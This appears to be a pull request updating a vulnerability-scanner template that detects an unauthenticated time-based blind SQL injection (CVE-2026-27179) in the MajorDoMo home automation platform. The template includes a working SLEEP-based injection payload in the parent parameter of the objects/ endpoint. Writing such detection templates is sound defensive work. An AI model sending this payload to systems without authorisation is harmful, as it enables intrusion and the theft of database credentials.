### PR TITLE
Add CVE-2026-27179: MajorDoMo Unauthenticated SQL Injection

### DIFF
--- a/http/cves/2026/CVE-2026-27179.yaml
+++ b/http/cves/2026/CVE-2026-27179.yaml
@@ -3,7 +3,7 @@ id: CVE-2026-27179
 info:
   name: MajorDoMo - Unauthenticated SQL Injection
   author: optimus-fulcria
-  severity: critical
+  severity: high
   description: |
     MajorDoMo home automation platform contains an unauthenticated SQL injection vulnerability in the objects/ endpoint. The parent parameter in the commands module is passed directly to SQL queries without sanitization, enabling time-based blind SQL injection. Attackers can extract database contents including credentials.
   impact: |
@@ -35,13 +35,20 @@ http:
         Host: {{Hostname}}
 
       - |
+        @timeout: 15s
         GET /objects/?module=commands&parent='+AND+SLEEP(6)--+- HTTP/1.1
         Host: {{Hostname}}
 
     matchers-condition: and
     matchers:
+      - type: word
+        part: body_1
+        words:
+          - "MajorDoMo"
+
       - type: dsl
         dsl:
+          - 'duration_1 < 2'
           - 'duration_2 >= 6'
           - 'duration_2 - duration_1 >= 5'
         condition: and


### PR DESCRIPTION
## Summary
- **CVE:** CVE-2026-27179
- **CVSS:** 7.5 High
- **CWE:** CWE-89 (SQL Injection)
- **Product:** MajorDoMo home automation
- **Auth Required:** None (unauthenticated)

Detection template for time-based blind SQL injection via the parent parameter in the objects/ commands module endpoint.

## References
- https://chocapikk.com/posts/2026/majordomo-revisited/
- https://nvd.nist.gov/vuln/detail/CVE-2026-27179